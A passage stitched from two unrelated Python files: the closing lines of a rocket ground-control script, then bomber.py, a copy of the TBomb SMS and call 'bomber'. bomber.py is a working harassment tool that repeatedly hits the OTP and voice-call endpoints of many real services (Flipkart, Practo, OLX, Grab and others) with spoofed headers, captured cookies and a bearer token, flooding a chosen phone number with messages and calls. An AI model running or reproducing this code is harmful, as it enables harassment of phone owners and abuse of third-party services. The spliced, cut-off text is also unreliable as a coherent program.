print("Exiting...")
print("GUI process ended")
usb_process.join()
print("USB process ended")
log_process.join()
print("Logging process ended")
time.sleep(0.2)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal.SIG_DFL) # Exit on Ctrl-C
# Process arguments
parser = argparse.ArgumentParser(description=
"""Martlet IV Ground Control Software.
Connect to Firing Controller on given serial port (default '/dev/ttyACM0')""")
parser.add_argument('-p', dest='port', type=str, nargs='?',
default='/dev/ttyACM0', help='Serial port to use')
run(parser.parse_args())
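# Typical invocation (the port value below is illustrative; the default is
# '/dev/ttyACM0', as defined in the argument parser above):
#   python run.py -p /dev/ttyACM1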
|
bomber.py
|
#!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
import urllib.error  # needed for the HTTPError/URLError handling in getapi()
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To SpeedX And All Other Contributors Listed At https://github.com/TheSpeedX/TBomb
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def banner():
clr()
logo="""
████████ ██████ ██
▒█▒▒▒██ ██
██ ██ ██ ████ ██ ██ ██
██ ██████▒ ██▒▒██ ███ ███ █████
██ ██▒▒▒██ ██ ██ ██▒█▒██ ██▒▒██
██ ██ ██ ██ ██ ██ ▒ ██ ██ ██
██ ██████▒ ▒████▒ ██ ██ █████▒
▒▒ ▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒▒▒▒
"""
print(random.choice(colors)+logo+W)
print("\n")
count_inf = 0
def infinite(pn, dl, ch, maxlim):
global count_inf
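# proc.xxx on disk acts as a crude mutex between the sender threads: a thread
# waits while the file exists, creates it before firing a request, and removes
# it again once the attempt is done, so only one request is in flight at a time.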
while True:
while os.path.exists('proc.xxx'):
time.sleep(0.5)
os.system('touch proc.xxx')
api = random.choice(ch)
try:
ret = getapi(pn, api, 91)
except Exception:
ret = False
if not ret:
while ch.count(api) > 0:
ch.remove(api)
# drop the lock file before retrying so the other threads don't stall
os.system('rm proc.xxx >/dev/null 2>&1')
continue
os.system('rm proc.xxx >/dev/null 2>&1')
count_inf += 1
# os.system('echo SpeedX >> count.xxx')
time.sleep(float(dl))
if (count_inf > maxlim):
exit()
def checkinternet():
# res becomes True when the connectivity check fails
res = False
try:
requests.get('https://www.google.com', verify=True)
except Exception:
res = True
if res:
print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print('\t\tTBomb Will Stop Now...\n\n')
banner()
exit()
def getapi(pn, lim, cc):
global country_codes
cc = str(cc).strip()
cnn = country_codes[cc]
lim = int(lim)
url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
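# Indices 0-2 are plain GET endpoints taken from the list above; indices 3-16
# are handled by the elif branches below, and the call-bombing indices
# (100 and up) follow after those.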
try:
if lim < len(url):
urllib.request.urlopen(str(url[lim]))
return True
except (urllib.error.HTTPError, urllib.error.URLError):
return False
if lim == 3:
headers = {
'Host': 'm.netmeds.com',
'content-length': '76',
'accept': '*/*',
'origin': 'https://m.netmeds.com',
'x-requested-with': 'XMLHttpRequest',
'save-data': 'on',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'referer': 'https://m.netmeds.com/customer/account/login/',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': '_ga=GA1.3.185497001.1558720330'}
data = {
'register_mobileno': pn,
'logintype': 'Otp',
'uniq_identy': 'quWqfunF',
'forget_pwd': 'N'
}
response = requests.post('https://m.netmeds.com/sociallogin/popup/nmsgetcode/', headers=headers, data=data)
return True
elif lim == 4:
headers = {
'Host': 'client-api.goomo.com',
'origin': 'https://www.goomo.com',
'client': 'm-web',
'x-goomo-platform': 'mWeb',
'dnt': '1',
'content-type': 'application/json',
'accept': '*/*',
'referer': 'https://www.goomo.com/hotels',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9'}
data = {"email":"fakeemail@gmail.com","phone_number":pn,"country_code":cc}
response = requests.post('https://client-api.goomo.com/v2/phone_confirmation/verify_user', headers=headers, json=data)
return True
elif lim == 5:
headers = {
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Content-Length': '34',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'www.oriyamatrimony.com',
'Referer': 'https://www.oriyamatrimony.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 8.1; Win64; x64; rv:59.0) Gecko/20 Firefox/56.0',
'X-Requested-With': 'XMLHttpRequest'}
data = {'countrycode': cc, 'mobileno': pn}
response = requests.post('https://www.oriyamatrimony.com/login/mobileappsms-homepage.php', headers=headers, data=data)
return True
elif lim == 6:
headers = {
'host': 'www.flipkart.com',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0',
'accept': '*/*',
'accept-language': 'en-US,en;q=0.5',
'accept-encoding': 'gzip, deflate, br',
'referer': 'https://www.flipkart.com/',
'x-user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop',
'origin': 'https://www.flipkart.com',
'connection': 'keep-alive',
'Content-Type': 'application/json; charset=utf-8'}
data = {"loginId":["+"+cc+pn],"supportAllStates":true}
response = requests.post('https://www.flipkart.com/api/6/user/signup/status', headers=headers, json=data)
return True
elif lim == 7:
cookies = {
'Cookie:T': 'BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050',
'SWAB': 'build-44be9e47461a74d737914207bcbafc30',
'lux_uid': '155867904381892986',
'AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg': '1',
'AMCV_17EB401053DAF4840A490D4C%40AdobeOrg': '-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI',
's_cc': 'true',
'SN': '2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078',
'gpv_pn': 'HomePage',
'gpv_pn_t': 'Homepage',
'S': 'd1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==',
's_sq': '%5B%5BB%5D%5D'}
headers = {
'Host': 'www.flipkart.com',
'Connection': 'keep-alive',
'Content-Length': '60',
'X-user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop',
'Origin': 'https://www.flipkart.com',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': '*/*',
'Referer': 'https://www.flipkart.com/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {
'loginId': '+'+cc+pn,
'state': 'VERIFIED',
'churnEmailRequest': 'false'
}
response = requests.post('https://www.flipkart.com/api/5/user/otp/generate', headers=headers, cookies=cookies, data=data)
return True
elif lim == 8:
headers = {
'Host': 'www.ref-r.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '26',
'DNT': '1',
'Connection': 'keep-alive',
}
data = {
'mobile': pn,
'submit': '1',
'undefined': ''
}
response = requests.post('https://www.ref-r.com/clients/lenskart/smsApi', headers=headers, data=data)
return True
elif lim == 9:
headers = {
'X-DROID-VERSION': '4.12.5',
'API-Version': '2.0',
'user-agent': 'samsung SM-G9350 0 4.4.2',
'client-version': 'Android-4.12.5',
'X-DROID-VERSION-CODE': '158',
'Accept': 'application/json',
'client-name': 'Practo Android App',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'accounts.practo.com',
'Connection': 'Keep-Alive',
'Content-Length': '96'}
data = {
'client_name': 'Practo Android App',
'mobile': '+' + cc + pn,
'fingerprint': '',
'device_name':'samsung+SM-G9350'}
response = requests.post( "https://accounts.practo.com/send_otp", headers=headers, data=data)
rd=response.text
# rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return rd.find("success") != -1
elif lim == 10:
headers = {
'Host': 'm.pizzahut.co.in',
'content-length': '114',
'origin': 'https://m.pizzahut.co.in',
'authorization': 'Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4',
'x-source-origin': 'PWAFW',
'content-type': 'application/json',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'save-data': 'on',
'languagecode': 'en',
'referer': 'https://m.pizzahut.co.in/login',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': 'AKA_A2=A'}
data = {"customer":{"MobileNo":pn,"UserName":pn,"merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}
response = requests.post('https://m.pizzahut.co.in/api/cart/send-otp?langCode=en', headers=headers, data=data)
return True
elif lim == 11:
headers = {
'host': 'www.goibibo.com',
'user-agent': 'Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'accept-language': 'en-US,en;q=0.5',
'accept-encoding': 'gzip, deflate, br',
'referer': 'https://www.goibibo.com/mobile/?sms=success',
'content-type': 'application/x-www-form-urlencoded',
'content-length': '14',
'connection': 'keep-alive',
'upgrade-insecure-requests': '1'}
data = {'mbl': pn}
response = requests.post('https://www.goibibo.com/common/downloadsms/', headers=headers, data=data)
return True
elif lim == 12:
headers = {
'Host': 'www.apollopharmacy.in',
'content-length': '17',
'accept': '*/*',
'origin': 'https://www.apollopharmacy.in',
'x-requested-with': 'XMLHttpRequest',
'save-data': 'on',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'referer': 'https://www.apollopharmacy.in/sociallogin/mobile/login/',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': 'section_data_ids=%7B%22cart%22%3A1560239751%7D'}
data = {'mobile': pn}
response = requests.post('https://www.apollopharmacy.in/sociallogin/mobile/sendotp/', headers=headers, data=data)
rd=response.text
return rd.find("sent") != -1
elif lim == 13:
cookies = {
'Cookie:_ga': 'GA1.2.979928319.1560364071',
'_gid': 'GA1.2.666270216.1560364071',
'V': '201',
'_fbp': 'fb.1.1560364076913.1528349725',
'cto_lwid': 'd91bea3a-7610-45aa-8f78-65a0d740fb46',
'PushSubscriberStatus': 'DENIED',
'peclosed': 'true',
'G_ENABLED_IDPS': 'google',
'TS018cc593': '01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50',
'_gac_UA-68002030-1': '1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB',
'cdigiMrkt': 'utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C',
'ImpressionCookie': '4',
'ip': '10.1.10.1',
'sessionStatus': 'true|undefined',
'FirstPage': 'Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time)',
'_dc_gtm_UA-68002030-1': '1',
'uI': 'johnyaho%40gmail.com',
'TS01fe4249': '01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c'}
headers = {
'Host': 'www.ajio.com',
'Connection': 'keep-alive',
'Content-Length': '144',
'Accept': 'application/json',
'Origin': 'https://www.ajio.com',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/json',
'Referer': 'https://www.ajio.com/signup',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6'}
data = {"firstName":"SpeedX","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"0000","requestType":"SENDOTP"}
response = requests.post('https://www.ajio.com/api/auth/signupSendOTP', headers=headers, cookies=cookies, json=data)
rd=response.text
if rd.find("\"statusCode\":\"1\"") != -1:
return True
else:
return False
elif lim == 14:
headers = {
'Host': 'api.cloud.altbalaji.com',
'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*',
'Origin': 'https://lite.altbalaji.com',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36',
'Content-Type': 'application/json;charset=UTF-8',
'Referer': 'https://lite.altbalaji.com/subscribe?progress=input',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {"country_code":cc,"phone_number":pn}
response = requests.post('https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN', headers=headers, json=data)
rd=response.text
return rd == '24f467b24087ff48c96321786d89c69f'
elif lim == 15:
cookies = {
'Cookie:frontend': 'a27mn3h3irt1rlt6i55s93p9r5',
'frontend_cid': '8zqBBzwQTMIt9UKg',
'_BEAMER_USER_ID_gADrycBn12870': 'c9fe4f7d-b421-4bad-9cf2-0a4db716dff4',
'G_ENABLED_IDPS': 'google',
}
headers = {
'Host': 'www.aala.com',
'Connection': 'keep-alive',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Origin': 'https://www.aala.com',
'X-Requested-With': 'XMLHttpRequest',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://www.aala.com/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5',
}
data = {
'email': cc+pn,
'firstname': 'SpeedX',
'lastname': 'SpeedX'
}
response = requests.post('https://www.aala.com/accustomer/ajax/getOTP', headers=headers, cookies=cookies, json=data)
rd=response.text
return rd.find('code:') != -1
elif lim == 16:
data = {
'method': 'SMS',
'countryCode': 'id',
'phoneNumber': cc+pn,
'templateID': 'pax_android_production'
}
response = requests.post('https://api.grab.com/grabid/v1/phone/otp', data=data)
return True
elif lim == 100:
rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
pn + '?callType=otpOnCall"').read()
return rd.lower().find("new otp has been") != -1
elif lim == 101:
rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return rd.lower().find("otp requests exceeded") == -1
elif lim == 102:
rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return rd.lower().find("y") != -1
elif lim == 103:
os.system(
'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True
elif lim == 104:
rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8')
return rd.lower().strip().find('callmade') != -1
elif lim == 106:
rd = os.popen(
'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return rd.find("1") != -1
return False
def remsp(num):
num = num.replace(' ', '')
num = num.replace('-', '')
return num
def start(target, counter, delay, ch, cc):
clr()
banner()
failed = 0
requested = 0
success = int(requested) - int(failed)
bombs = int(counter) + 1
while success < (int(bombs)):
os.system('clear')
banner()
try:
api = random.choice(ch)
except Exception:
if cc == "91":
print('Sorry All APIs Have Expired Please Update TBomb')
input('Press Enter To Exit...')
exit()
else:
if success > 0:
print(
'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print(
'\nWe Are Working Hard To Increase The International Limit...')
input(
'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os.system('rm *.xxx* > /dev/null 2>&1')
print('\n\n')
